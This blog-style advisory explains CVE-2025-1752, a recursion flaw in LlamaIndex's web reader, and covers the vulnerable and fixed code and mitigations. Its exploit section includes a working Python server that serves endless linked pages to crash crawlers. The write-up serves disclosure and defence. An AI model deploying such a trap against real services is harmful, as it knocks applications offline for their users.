Infinite Loops and Broken Dreams: Crashing LlamaIndex with a Single Link
Jan 11, 2026 · 5 min read
Executive Summary (TL;DR)
LlamaIndex's web reader failed to enforce its own `max_depth` parameter. An attacker can supply a URL pointing to a malicious site with circular links (A -> B -> A), causing the crawler to recurse without limit. This triggers a `RecursionError` and crashes the application, resulting in a Denial of Service. Fixed in `llama-index-readers-web` version 0.3.6.
A classic logic error in LlamaIndex's `KnowledgeBaseWebReader` lets attackers crash Python processes via uncontrolled recursion. By ignoring its own safety parameter, the library wanders endlessly into deep or circular link structures until the stack explodes.
The Hook: When AI Crawlers Get Lost
LlamaIndex is the darling of the RAG (Retrieval-Augmented Generation) world, acting as the connective tissue between your messy data and your shiny LLM. One of its key features is the `KnowledgeBaseWebReader`, a tool designed to scrape documentation and knowledge bases so your AI actually knows what it's talking about.
The premise is simple: you give it a `root_url`, and it crawls the site to build an index. It's supposed to be smart. It's supposed to handle modern web complexities. But in this case, it was a little too eager.
Imagine sending a robot into a library to count books, but the library is a fantastical labyrinth where hallways loop back on themselves. Without a map or a step counter, the robot just keeps walking until its batteries die. That is exactly what happens here. A malicious actor can feed the reader a URL that leads down a rabbit hole with no bottom, crashing the underlying Python process and taking your AI service offline.
The Flaw: A Speed Limit Sign with No Police
The vulnerability is tracked as CWE-674: Uncontrolled Recursion. In computer science 101, we learn that every recursive function needs a 'base case': a condition that tells it to stop calling itself. Without one, you get a stack overflow (or, in Python's case, a `RecursionError`).
The irony of CVE-2025-1752 is that the developers knew they needed a limit. The function signature for `get_article_urls` proudly displayed a `max_depth` parameter, defaulting to 100. It looked safe. It felt safe.
But here's the punchline: the code never actually checked that parameter. It was like putting up a "Speed Limit 55" sign but firing all the police officers. The variable was accepted, passed around, and completely ignored. The crawler would blindly follow links A -> B -> C -> ... -> Infinity, oblivious to the fact that it was supposed to stop hundreds of hops earlier.
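To see the failure mode in isolation, here is a throwaway sketch (nothing to do with LlamaIndex) of a recursive function with no base case. Python kills it as soon as the call stack passes the interpreter's limit:

```python
import sys

def follow_links(depth=0):
    # No base case: nothing here ever says "stop"
    return follow_links(depth + 1)

print(sys.getrecursionlimit())  # typically 1000
follow_links()  # raises RecursionError: maximum recursion depth exceeded
```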
The Code: The Smoking Gun
Let's look at the diff. It's painfully simple, which makes it all the more tragic. In the vulnerable version, the recursion fired away with no record of how deep it already was.
Vulnerable Code (Simplified):

```python
# The max_depth is right there! But it does nothing!
def get_article_urls(self, browser, root_url, current_url, max_depth=100):
    # ... scraping logic populates `links` ...
    for link in links:
        # We just keep going, passing along the same ignored max_depth
        self.get_article_urls(browser, root_url, link, max_depth)
```

The fix involved actually implementing the logic implied by the parameter. They introduced a depth counter that increments with every recursive dive.
Fixed Code (Commit 3c65db2947):

```python
def get_article_urls(
    self, browser, root_url, current_url, max_depth=100, depth=0
):
    # The base case we were promised
    if depth >= max_depth:
        print(f"Reached max depth ({max_depth}): {current_url}")
        return []
    # ... scraping logic populates `links` ...
    for link in links:
        # Pass depth + 1 to the next victim
        self.get_article_urls(browser, root_url, link, max_depth, depth + 1)
```

> [!NOTE]
> Even with this fix, there is a secondary concern. The code opens a new Playwright browser page (`browser.new_page()`) at the start of the function and closes it at the end. In a recursion of depth 100, you might have 100 browser tabs open simultaneously on the stack before the first one closes. While the infinite recursion is fixed, memory exhaustion is still a very real risk for deep crawls.
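For contrast, here is a minimal sketch of how an iterative crawl sidesteps both problems at once. This is not the library's code; `fetch_links` is a hypothetical stand-in for the Playwright scraping step. With an explicit queue there is no call stack to overflow, only one unit of work is live at a time, and the visited set neutralizes A -> B -> A loops outright:

```python
from collections import deque

def get_article_urls_iterative(fetch_links, root_url, max_depth=100):
    # fetch_links(url) -> list[str] is a hypothetical scraping callable,
    # not part of the LlamaIndex API.
    visited = {root_url}
    queue = deque([(root_url, 0)])  # (url, depth) pairs
    collected = []
    while queue:
        url, depth = queue.popleft()
        collected.append(url)
        if depth >= max_depth:
            continue  # depth limit enforced per URL, no stack involved
        for link in fetch_links(url):
            if link not in visited:  # dedup: circular links are seen once
                visited.add(link)
                queue.append((link, depth + 1))
    return collected
```

The real patch kept the recursive shape and only added the depth check; the queue-based version is simply the more defensive design if you ever write a crawler yourself.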
The Exploit: Ouroboros
Exploiting this is trivial. You don't need shellcode; you just need a web server and a sense of humor. The goal is to trigger Python's default recursion limit (usually 1000).
The Attack Chain:
- Setup: Host a malicious web page.
- The Trap: Create two pages that link to each other, or a single page that links to itself with a query parameter to make each URL look unique (to bypass simple deduping, though this reader didn't seem to have that either). A minimal server for this trap is sketched after this list.
```html
<!-- index.html -->
<a href="/page/1">Click me</a>

<!-- /page/1 -->
<a href="/page/2">Next</a>

<!-- /page/2 -->
<a href="/page/3">Next</a>
...
```

- The Trigger: Feed your malicious URL to an application using LlamaIndex.
- The Crash: The `KnowledgeBaseWebReader` sees a link, follows it, sees another link, follows it. Since `max_depth` is ignored, it passes the 100 mark, passes the 200 mark, and eventually hits the Python interpreter's hard limit.
The application throws `RecursionError: maximum recursion depth exceeded` and the worker process dies immediately. If this worker handles a queue of jobs, the queue stalls. If it's a synchronous API, the server returns a 500 error.
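To make the trap from step 2 concrete, here is a minimal sketch of the bottomless site using only Python's standard library. The port and the `/page/<n>` scheme are illustrative, not from the advisory:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

class BottomlessSite(BaseHTTPRequestHandler):
    """Every page links to /page/<n+1>, so a crawler never runs out of URLs."""

    def do_GET(self):
        # Derive the next page number from the current path: / -> 1, /page/3 -> 4
        if self.path.startswith("/page/"):
            n = int(self.path.rsplit("/", 1)[-1]) + 1
        else:
            n = 1
        body = f'<html><body><a href="/page/{n}">Next</a></body></html>'.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), BottomlessSite).serve_forever()
```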
The Fix: Stopping the Bleeding
The remediation is straightforward: update your dependencies. The vendor patched this in `llama-index-readers-web` version 0.3.6.
However, developers relying on web crawling should always be paranoid. Trusting a library's internal depth limit is fine, but you should also:
- Enforce Global Timeouts: Don't let a crawl job run forever (see the sketch after this list).
- Resource Limits: Run your crawlers in isolated containers with strict memory limits so a crash doesn't take down the main application.
- Sanitize Inputs: Don't let users point your crawler at arbitrary IP addresses or untrusted domains.
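As a sketch of the first two points, assuming your crawl is wrapped in a picklable, zero-argument callable (the hypothetical `crawl_job` below), a child process gives you both a hard deadline and a blast-radius boundary: a `RecursionError` or an OOM kill takes out the child, not your API server:

```python
import multiprocessing as mp

def run_with_deadline(crawl_job, timeout_s=120):
    # crawl_job is a hypothetical zero-argument callable wrapping the reader.
    proc = mp.Process(target=crawl_job, daemon=True)
    proc.start()
    proc.join(timeout_s)  # block for at most timeout_s seconds
    if proc.is_alive():
        proc.terminate()  # hard stop; the crawl gets no say in the matter
        proc.join()
        raise TimeoutError(f"Crawl exceeded {timeout_s}s and was terminated")
```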
```bash
# Check your version
pip show llama-index-readers-web

# Update immediately
pip install --upgrade llama-index-readers-web
```
Technical Appendix
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Affected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
| llama-index-readers-web (LlamaIndex) | < 0.3.6 | 0.3.6 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-674 (Uncontrolled Recursion) |
| CVSS v3.1 | 7.5 (High) |
| Attack Vector | Network |
| Impact | Availability (DoS) |
| EPSS Score | 0.00058 (~18th percentile) |
| Affected Versions | < 0.3.6 |
CWE-674 Description
The software does not properly control the amount of recursion that can occur, consuming excessive resources, such as memory or the program stack.